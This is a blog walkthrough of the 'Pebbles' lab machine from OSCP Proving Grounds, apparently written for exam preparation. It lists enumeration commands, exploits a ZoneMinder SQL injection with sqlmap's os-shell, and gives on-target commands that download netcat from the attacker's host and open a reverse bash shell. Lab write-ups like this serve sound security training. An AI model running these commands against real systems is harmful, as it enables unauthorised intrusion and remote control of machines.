Open in app

Sign in

Write

Sign in

OSCP Proving Grounds Walkthrough: Pebbels

Aleksa Zatezalo
Offensive Security Library
Published in
3 min readAug 30, 2023
source: https://images.unsplash.com/photo-1507832321772-e86cc0452e9c?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxzZWFyY2h8M3x8cm9ja3N8ZW58MHx8MHx8fDA%3D&w=1000&q=80

Pebbles is a vulnerable machine on Offensive Securities Proving Grounds. It’s catagorized as a machine of level “Warm Up” with a community rating of hard. Here we will be walking you through the solution of the VM.

Enumeration

As with every pen test we will first start by running a basic nmap scan of pebbles using the following command:

> nmap -sV -sC -p- -O 192.168.168.52

We discover that it is a linux system running ftp (port 21), ssh (port 22), and Apache(on ports 80, 3305, 8080). Because none of the services are vulnerable to any known exploits we will start by attempting to brute force ftp with the following command:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.168.52 ftp

No usernames are found. In conjuction we can also enumerate all ports running apache via gobuster and nikto.

Enumeration with Nikto:


nikto -h http://192.168.168.52/
nikto -h http://192.168.168.52:3305/
nikto -h http://192.168.168.52:8080/

Gobuster:

gobuster dir -u http://192.168.168.52/ -w /usr/share/wordlists/dirb/big.txt 
gobuster dir -u http://192.168.168.52:3305/ -w /usr/share/wordlists/dirb/big.txt 
gobuster dir -u http://192.168.168.52:8080/ -w /usr/share/wordlists/dirb/big.txt

The go buster scan on port 8080 was the first to finish and yielded some interesting results as seen below.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.168.52:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/30 15:32:53 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 281]
/.htpasswd            (Status: 403) [Size: 281]
/WEB-INF              (Status: 301) [Size: 325] [--> http://192.168.168.52:8080/WEB-INF/]
/cgi-bin/             (Status: 403) [Size: 281]
/favicon.ico          (Status: 200) [Size: 21630]
/javascript           (Status: 301) [Size: 328] [--> http://192.168.168.52:8080/javascript/]
/server-status        (Status: 403) [Size: 281]
/zm                   (Status: 301) [Size: 320] [--> http://192.168.168.52:8080/zm/]

===============================================================
2023/08/30 15:33:59 Finished
===============================================================

Visiting the URL http://192.168.168.52:3305/zm showed we were running ZoneMinder v1.29.0.

ZoneMinder v1.29.0

An initial search on google shows it’s vulnerable to many CVEs. Running the following command in terminal shows us an interesting txt file that may show us how to exploit it.

> searchsploit -m 41239.txt

Initial Access

ZoneMinder v.1.29.0 was found to be vulnerable to SQL injection on the extension */zm/index.php*. After some experimentation I found this command as yields a web shell:

>sqlmap http://192.168.168.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell

This yields a shell. However it is painfully slow and we can get a fully interactive reverse and fast shell by transferring netcat to the target machine and have it execute a bindshell on a port we are listening on. We will start by getting our own IP address and starting a simple server in a directory with the nc (netcat) binary.

Getting Our IP:

>ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 192.168.45.247  netmask 255.255.255.0  destination 192.168.45.247
        inet6 fe80::f8da:433d:b46a:d452  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 227964  bytes 90224062 (86.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 374841  bytes 41861061 (39.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Getting nc:

> cp $(which nc) .
> ls 
nc

Running a server:

>python3 -m http.server 80

Starting a listener:

> nc -nlvp 3305

On the victim machine we will run the following commands:

os-shell> wget “http://192.168.45.247/nc" -O /tmp/nc
os-shell> chmod +x /tmp/nc
os-shell> /tmp/nc -e /bin/bash 192.168.45.247 3305

There you have it. We have root access on our attacking machine. No neet to priv-esc.

Hacking
Oscp
Oscp Preparation

--

--

Aleksa Zatezalo
Offensive Security Library

Written by Aleksa Zatezalo

338 Followers
Editor for

Interested in the intersection of Cloud, Cyber Security, and Artificial Intelligence. Continually striving towards mastery of my domain. Forever an Apprentice.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams